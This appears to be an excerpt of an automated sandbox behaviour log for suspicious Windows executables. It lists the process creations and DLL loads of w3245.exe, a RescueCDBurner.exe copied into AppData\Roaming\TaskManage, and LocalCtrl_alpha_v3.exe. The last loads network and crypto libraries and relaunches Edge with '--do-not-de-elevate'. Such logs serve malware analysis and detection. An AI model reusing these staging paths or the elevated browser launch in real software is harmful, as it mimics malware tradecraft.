Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3
Source: C:\Users\user\Desktop\w3245.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
